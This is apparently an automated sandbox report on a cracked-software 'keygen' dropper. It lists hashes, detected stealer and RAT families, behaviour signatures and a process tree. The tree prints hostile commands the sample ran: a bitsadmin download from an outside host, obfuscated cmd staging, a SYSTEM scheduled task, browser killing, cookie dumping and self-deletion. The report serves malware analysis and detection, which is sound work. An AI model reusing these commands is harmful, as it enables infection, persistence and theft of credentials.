Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1549s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 40 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2340
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2592
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2568
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2488
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2304
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1868
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1436
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1348
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1256
                • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                  "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                  1⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:1824
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1584
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                      3⤵
                      • Loads dropped DLL
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2612
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2660
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3240
                    • C:\Users\Admin\AppData\Local\Temp\is-3LGE7.tmp\Install.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-3LGE7.tmp\Install.tmp" /SL5="$401A2,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:3388
                      • C:\Users\Admin\AppData\Local\Temp\is-FKP18.tmp\Ultra.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-FKP18.tmp\Ultra.exe" /S /UID=burnerch1
                        4⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3692
                        • C:\Program Files\Java\GJXQFHEEWB\ultramediaburner.exe
                          "C:\Program Files\Java\GJXQFHEEWB\ultramediaburner.exe" /VERYSILENT
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4316
                          • C:\Users\Admin\AppData\Local\Temp\is-ND6K4.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-ND6K4.tmp\ultramediaburner.tmp" /SL5="$301EE,281924,62464,C:\Program Files\Java\GJXQFHEEWB\ultramediaburner.exe" /VERYSILENT
                            6⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:4348
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              7⤵
                              • Executes dropped EXE
                              PID:4424
                        • C:\Users\Admin\AppData\Local\Temp\17-ba554-b75-30783-be18c8fd65e92\Ryfaerusimi.exe
                          "C:\Users\Admin\AppData\Local\Temp\17-ba554-b75-30783-be18c8fd65e92\Ryfaerusimi.exe"
                          5⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4392
                        • C:\Users\Admin\AppData\Local\Temp\97-d04fd-f90-d43bc-f70231f3028f6\Taepenawugae.exe
                          "C:\Users\Admin\AppData\Local\Temp\97-d04fd-f90-d43bc-f70231f3028f6\Taepenawugae.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4472
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipd242qc.jdw\KiffMainE1.exe & exit
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4344
                            • C:\Users\Admin\AppData\Local\Temp\ipd242qc.jdw\KiffMainE1.exe
                              C:\Users\Admin\AppData\Local\Temp\ipd242qc.jdw\KiffMainE1.exe
                              7⤵
                              • Executes dropped EXE
                              PID:4104
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ycxy1zz.btb\001.exe & exit
                            6⤵
                              PID:3144
                              • C:\Users\Admin\AppData\Local\Temp\0ycxy1zz.btb\001.exe
                                C:\Users\Admin\AppData\Local\Temp\0ycxy1zz.btb\001.exe
                                7⤵
                                • Executes dropped EXE
                                PID:1864
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ryhjp32o.uuh\installer.exe /qn CAMPAIGN="654" & exit
                              6⤵
                                PID:5076
                                • C:\Users\Admin\AppData\Local\Temp\ryhjp32o.uuh\installer.exe
                                  C:\Users\Admin\AppData\Local\Temp\ryhjp32o.uuh\installer.exe /qn CAMPAIGN="654"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Modifies system certificate store
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4636
                                  • C:\Windows\SysWOW64\msiexec.exe
                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ryhjp32o.uuh\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ryhjp32o.uuh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620031220 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                    8⤵
                                      PID:5252
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ilfjzcql.3jk\gpooe.exe & exit
                                  6⤵
                                    PID:5012
                                    • C:\Users\Admin\AppData\Local\Temp\ilfjzcql.3jk\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\ilfjzcql.3jk\gpooe.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4432
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5140
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5500
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:6480
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:944
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\do3wr4it.wwr\google-game.exe & exit
                                    6⤵
                                      PID:6088
                                      • C:\Users\Admin\AppData\Local\Temp\do3wr4it.wwr\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\do3wr4it.wwr\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4284
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          PID:5380
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jnrhxzh0.4wz\huesaa.exe & exit
                                      6⤵
                                        PID:4136
                                        • C:\Users\Admin\AppData\Local\Temp\jnrhxzh0.4wz\huesaa.exe
                                          C:\Users\Admin\AppData\Local\Temp\jnrhxzh0.4wz\huesaa.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2196
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5856
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:6264
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4412
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4824
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ea2ggbvm.fx4\askinstall39.exe & exit
                                        6⤵
                                          PID:3948
                                          • C:\Users\Admin\AppData\Local\Temp\ea2ggbvm.fx4\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\ea2ggbvm.fx4\askinstall39.exe
                                            7⤵
                                              PID:4752
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:6316
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:6424
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2n1jidfu.100\setup.exe & exit
                                              6⤵
                                                PID:6176
                                                • C:\Users\Admin\AppData\Local\Temp\2n1jidfu.100\setup.exe
                                                  C:\Users\Admin\AppData\Local\Temp\2n1jidfu.100\setup.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:6304
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2n1jidfu.100\setup.exe"
                                                    8⤵
                                                      PID:6540
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 1.1.1.1 -n 1 -w 3000
                                                        9⤵
                                                        • Runs ping.exe
                                                        PID:6612
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slhsmufl.tkj\y1.exe & exit
                                                  6⤵
                                                    PID:6484
                                                    • C:\Users\Admin\AppData\Local\Temp\slhsmufl.tkj\y1.exe
                                                      C:\Users\Admin\AppData\Local\Temp\slhsmufl.tkj\y1.exe
                                                      7⤵
                                                        PID:6588
                                                        • C:\Users\Admin\AppData\Local\Temp\jHqhk6xTEL.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\jHqhk6xTEL.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          PID:5616
                                                          • C:\Users\Admin\AppData\Roaming\1620290571590.exe
                                                            "C:\Users\Admin\AppData\Roaming\1620290571590.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620290571590.txt"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:5640
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\jHqhk6xTEL.exe"
                                                            9⤵
                                                              PID:4332
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 3
                                                                10⤵
                                                                • Runs ping.exe
                                                                PID:3724
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\slhsmufl.tkj\y1.exe"
                                                            8⤵
                                                              PID:6996
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /T 10 /NOBREAK
                                                                9⤵
                                                                • Delays execution with timeout.exe
                                                                PID:6916
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s45qmfxh.m53\Setup_v3.exe & exit
                                                          6⤵
                                                            PID:6672
                                                            • C:\Users\Admin\AppData\Local\Temp\s45qmfxh.m53\Setup_v3.exe
                                                              C:\Users\Admin\AppData\Local\Temp\s45qmfxh.m53\Setup_v3.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6828
                                                              • C:\Windows\SysWOW64\at.exe
                                                                "C:\Windows\System32\at.exe"
                                                                8⤵
                                                                  PID:6960
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                  8⤵
                                                                    PID:7060
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\System32\cmd.exe
                                                                      9⤵
                                                                        PID:2312
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                          10⤵
                                                                            PID:4312
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            Fessura.exe.com Z
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:7004
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6684
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                12⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:780
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  13⤵
                                                                                    PID:5372
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4196
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping 127.0.0.1 -n 30
                                                                              10⤵
                                                                              • Runs ping.exe
                                                                              PID:7076
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                          8⤵
                                                                            PID:1192
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lm20byz3.s5y\toolspab1.exe & exit
                                                                        6⤵
                                                                          PID:6856
                                                                          • C:\Users\Admin\AppData\Local\Temp\lm20byz3.s5y\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\lm20byz3.s5y\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:7092
                                                                            • C:\Users\Admin\AppData\Local\Temp\lm20byz3.s5y\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\lm20byz3.s5y\toolspab1.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6480
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z5fulhvw.5e3\005.exe & exit
                                                                          6⤵
                                                                            PID:6944
                                                                            • C:\Users\Admin\AppData\Local\Temp\z5fulhvw.5e3\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\z5fulhvw.5e3\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:6252
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rl00w11r.04g\SunLabsPlayer.exe /S & exit
                                                                            6⤵
                                                                              PID:4224
                                                                              • C:\Users\Admin\AppData\Local\Temp\rl00w11r.04g\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\rl00w11r.04g\SunLabsPlayer.exe /S
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:6500
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6632
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2260
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4616
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:6332
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:6912
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:2352
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Checks for any installed AV software in registry
                                                                                              PID:6600
                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                              8⤵
                                                                                              • Download via BitsAdmin
                                                                                              PID:6648
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:3824
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6156
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6604
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:6488
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:7104
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:5608
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:2632
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                        8⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6872
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                          9⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:4368
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:5212
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            9⤵
                                                                                                              PID:3948
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:2280
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:6904
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
